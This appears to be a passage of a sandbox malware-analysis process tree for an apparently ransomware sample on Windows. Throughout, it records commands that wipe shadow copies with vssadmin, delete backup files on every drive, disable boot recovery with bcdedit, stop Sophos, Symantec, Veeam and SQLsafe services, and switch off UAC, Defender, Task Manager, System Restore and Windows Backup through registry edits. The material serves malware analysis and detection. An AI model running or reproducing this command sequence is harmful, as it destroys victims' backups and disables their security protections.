C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB4⤵PID:1612
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1360
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB3⤵PID:3920
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB4⤵PID:3444
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2928
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB3⤵PID:3344
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB4⤵PID:2060
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3700
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB3⤵PID:3640
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB4⤵PID:2228
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4152
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB3⤵PID:1472
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB4⤵PID:1068
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1188
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB3⤵PID:2772
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB4⤵PID:1964
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:508
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB3⤵PID:2784
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB4⤵PID:2488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB3⤵PID:2600
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB4⤵PID:1380
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1184
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB3⤵PID:1336
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB4⤵PID:4016
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3916
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB3⤵PID:1320
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB4⤵PID:1780
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4032
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB3⤵PID:1616
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB4⤵PID:1372
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3772
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB3⤵PID:664
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB4⤵PID:2684
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4256
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵PID:1176
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB4⤵PID:1220
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4288
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵PID:592
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB4⤵PID:1368
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4200
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵PID:1264
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB4⤵PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵PID:2568
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB4⤵PID:2256
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4192
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵PID:2392
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB4⤵PID:4052
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4080
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵PID:2552
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB4⤵PID:2080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4132
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵PID:1252
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB4⤵PID:4020
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB5⤵
- Interacts with shadow copies
PID:2224
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵PID:3028
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB4⤵PID:1932
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1340
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵PID:1136
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB4⤵PID:2180
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2156
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵PID:4004
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB4⤵PID:2332
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4308
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"3⤵PID:4176
-
C:\Windows\system32\net.exenet stop " Enterprise Client Service"4⤵PID:4428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop " Enterprise Client Service"5⤵PID:4500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Agent"3⤵PID:4756
-
C:\Windows\system32\net.exenet stop "Sophos Agent"4⤵PID:4768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent"5⤵PID:4780
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"3⤵PID:4808
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"4⤵PID:4820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"5⤵PID:4832
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"3⤵PID:4864
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"4⤵PID:4876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"5⤵PID:4888
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*3⤵PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*3⤵PID:4928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*3⤵PID:4948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"3⤵PID:4940
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"4⤵PID:5000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"5⤵PID:5016
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*3⤵PID:4964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*3⤵PID:4976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*3⤵PID:4988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*3⤵PID:5028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*3⤵PID:5052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*3⤵PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*3⤵PID:5088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*3⤵PID:5080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No3⤵PID:5112
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No4⤵PID:4460
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
PID:4776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*3⤵PID:2084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*3⤵PID:4000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*3⤵PID:772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*3⤵PID:4504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*3⤵PID:816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*3⤵PID:5104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*3⤵PID:4264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*3⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*3⤵PID:4784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*3⤵PID:4772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*3⤵PID:4804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*3⤵PID:4836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*3⤵PID:4840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵PID:4848
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures4⤵PID:504
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures5⤵
- Modifies boot configuration data using bcdedit
PID:1036
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*3⤵PID:2116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"3⤵PID:4808
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"4⤵PID:1736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"5⤵PID:1844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵PID:388
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
PID:1224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"3⤵PID:2020
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"4⤵PID:4904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"5⤵PID:4892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:3496
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵PID:260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"3⤵PID:4880
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"4⤵PID:3916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"5⤵PID:3344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:276
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵PID:4876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:4216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵PID:4128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"3⤵PID:4912
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"4⤵PID:4936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"5⤵PID:4868
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵PID:3904
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f4⤵PID:4240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵PID:2984
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f4⤵PID:4232
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"4⤵PID:3088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"3⤵PID:3324
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"4⤵PID:1068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"5⤵PID:1472
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵PID:1336
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵PID:1152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"3⤵PID:636
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"4⤵PID:2716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"5⤵PID:4164
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵PID:2928
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵PID:4352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"3⤵PID:1932
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"4⤵PID:4040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"5⤵PID:4336
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵PID:748
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵PID:4140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵PID:3444
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"3⤵PID:4464
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"4⤵PID:3028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"5⤵PID:4120
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵PID:4156
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f4⤵PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"3⤵PID:2456
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"4⤵PID:4976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"5⤵PID:5048
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵PID:3380
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f4⤵PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵PID:2124
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f4⤵PID:4448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"3⤵PID:4052
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"4⤵PID:3648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"5⤵PID:608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:3768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f4⤵PID:3144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"3⤵PID:1796
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"4⤵PID:5072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"5⤵PID:1936
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:3760
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f4⤵PID:3484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:3624
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f4⤵PID:356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"3⤵PID:2108
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"4⤵PID:492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"5⤵PID:4400
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:3836
-
